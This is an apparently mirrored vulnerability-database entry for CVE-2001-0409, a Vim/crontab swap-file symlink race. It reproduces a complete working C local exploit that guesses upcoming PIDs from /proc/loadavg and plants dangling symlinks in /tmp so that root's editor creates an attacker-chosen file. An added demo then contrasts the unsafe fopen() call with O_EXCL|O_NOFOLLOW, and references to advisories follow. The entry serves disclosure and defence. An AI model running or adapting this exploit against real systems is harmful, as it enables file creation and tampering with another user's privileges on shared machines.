Vim (also known as gvim) vulnerability

Vulnerability ID: 1106187    Type: Unknown
Published: 2001-01-26    Updated: 2005-05-02
CVE ID: CVE-2001-0409
CNNVD ID: CNNVD-200106-102
Platform: Linux    CVSS score: 2.1
|Vulnerability sources
https://www.exploit-db.com/exploits/20967
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200106-102
|Vulnerability details
Vim (also known as gvim) contains a vulnerability. While the victim is editing a file in a world-writable directory, a local user can modify the file being edited by planting symbolic links at the names of the backup and swap files.
|Vulnerability EXP
/*
source: http://www.securityfocus.com/bid/2927/info

Vim is an enhanced version of the popular text editor vi.

A race condition vulnerability exists in the swap file mechanism used by the 'vim' program. The error occurs when a swap file name for a file being opened is symbolically linked to a non-existent file.

By conjecturing the name of a file to be edited by another user, it may be possible for a local user to create a malicious symbolic link to a non-existent file. This could cause the new target file to be created with the permissions of the user running vim. 
*/

/*******************************************************************
             Crontab tmp file race condition

   http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=37771

   Apparently this is fixed. Wonder why it still works. 
      -- zen-parse

                     Local exploit

   Quick and dirty exploit for crontab insecure tmp files
   Redhat 7.0 - kept up2date with up2date
   Checked Tue Jun 26 00:15:32 NZST 2001
   -rw-------    1 root     root         4096 Jun 26 00:15 evil

   Requires root to execute crontab -e while the program is
   running.

   Not really likely to be too big of a problem, I hope.

   Could possibly be useful with the (still unpatched) 
   makewhatis.cron bug.

 *******************************************************************/

/* Headers for fopen/fscanf, atoi, and access/symlink/unlink. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

 #define SAFER [1000]
/*******************************************************************/
/* Read the fifth field of /proc/loadavg, the PID most recently
   assigned by the kernel; used below to guess the temp-file name
   that the next crontab -e will open. */
int shake(void)
{
 FILE *f;
 char r SAFER;
 int w;

 f=fopen("/proc/loadavg","r");
 if(!f) return 0;
 fscanf(f,"%*s %*s %*s %*s %s",r);
 fclose(f);
 w=atoi(r);
 return w;
}

int main(void)
{
 int p;
 char v SAFER;
 /* Plant a dangling link at the guessed swap-file path, then keep
    re-planting it for a window of upcoming PIDs until /evil appears
    (access() returns 0 once the editor has created it). */
 sprintf(v,"/tmp/.crontab.%d.swp",shake());
 symlink("/evil",v);
 while(access("/evil",0))
 {
  for(p=-30;p<0;p++)
  {
   sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
   symlink("/evil",v);
  }
  sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
  unlink(v);
 }
 /* Remove the planted links. */
 for(p=-100;p<0;p++)
 {
  sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
  unlink(v);
 }
 return 0;
}

 /*****************************************************************
 **   ***   *       **       *********      ***********************
 **    *    *   **   ******   *******   **   **********************
 **         *   **   **      ********   *******   ***      ********
 **   * *   *       *******   *******   ******  *  *  *  *  *******
 **   ***   *   ***********   **   **   **   *  *  *  *  *  *******
 **   ***   *   ******       ***   ***      ***   **  ****  *******
 *****************************************************************/
         //   
        //  xxxx   xxx    xxx   x   x
       //  xx     x   x  x      x   x
      //   xx     x   x   xxx   x   x
     //    xx     x   x      x   x x  
    //      xxxx   xxx    xxx     x
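The root cause above is an editor creating its swap file with an open() that follows whatever already sits at that path. The following added example (not part of the original exploit or of Vim) builds the same situation in a throwaway directory, a dangling symlink planted at a guessed swap-file name, and contrasts the naive fopen() pattern with the O_EXCL|O_NOFOLLOW pattern that defeats it; the directory and file names are constructed for the demo.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Naive pattern: fopen(...,"w") follows a pre-planted dangling symlink and
   creates whatever it points at. Returns 1 if the target now exists. */
static int naive_create(const char *swap, const char *target)
{
    FILE *f = fopen(swap, "w");
    if (f) fclose(f);
    return access(target, F_OK) == 0;
}

/* Hardened pattern: O_EXCL fails on any existing path, a dangling symlink
   included, and O_NOFOLLOW refuses symlinks outright. Returns fd or -1. */
static int safe_create(const char *swap)
{
    return open(swap, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed scenario: a fresh directory holds a dangling symlink standing
   in for a guessed swap-file name. Runs both patterns and returns 0 only if
   the naive one was fooled and the hardened one refused. */
int demo(void)
{
    char dir[] = "/tmp/swapdemo.XXXXXX";   /* constructed name, created here */
    char swap[256], target[256];
    if (!mkdtemp(dir)) return -1;
    snprintf(swap, sizeof swap, "%s/.file.swp", dir);
    snprintf(target, sizeof target, "%s/planted", dir);
    if (symlink(target, swap) != 0) return -1;   /* the planted link */

    int fooled = naive_create(swap, target);    /* target gets created */
    int fd = safe_create(swap);                 /* expected: -1 */
    int refused = (fd < 0 && (errno == EEXIST || errno == ELOOP));
    if (fd >= 0) close(fd);

    unlink(target); unlink(swap); rmdir(dir);
    return (fooled && refused) ? 0 : 1;
}
```

The demo uses a private, non-sticky directory so the follow is allowed; on kernels with fs.protected_symlinks=1, the same dangling link in a sticky world-writable directory such as /tmp would already be refused for the naive open, which is the kernel-side mitigation for this class of race.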
|References

Source: CALDERA
Name: CSSA-2001-014.0
Link: http://www.calderasystems.com/support/security/advisories/CSSA-2001-014.0.txt
Source: XF
Name: vim-tmp-symlink(6628)
Link: http://xforce.iss.net/static/6628.php
Source: SUSE
Name: SuSE-SA:2001:12
Link: http://www.novell.com/linux/security/advisories/2001_012_vim.html
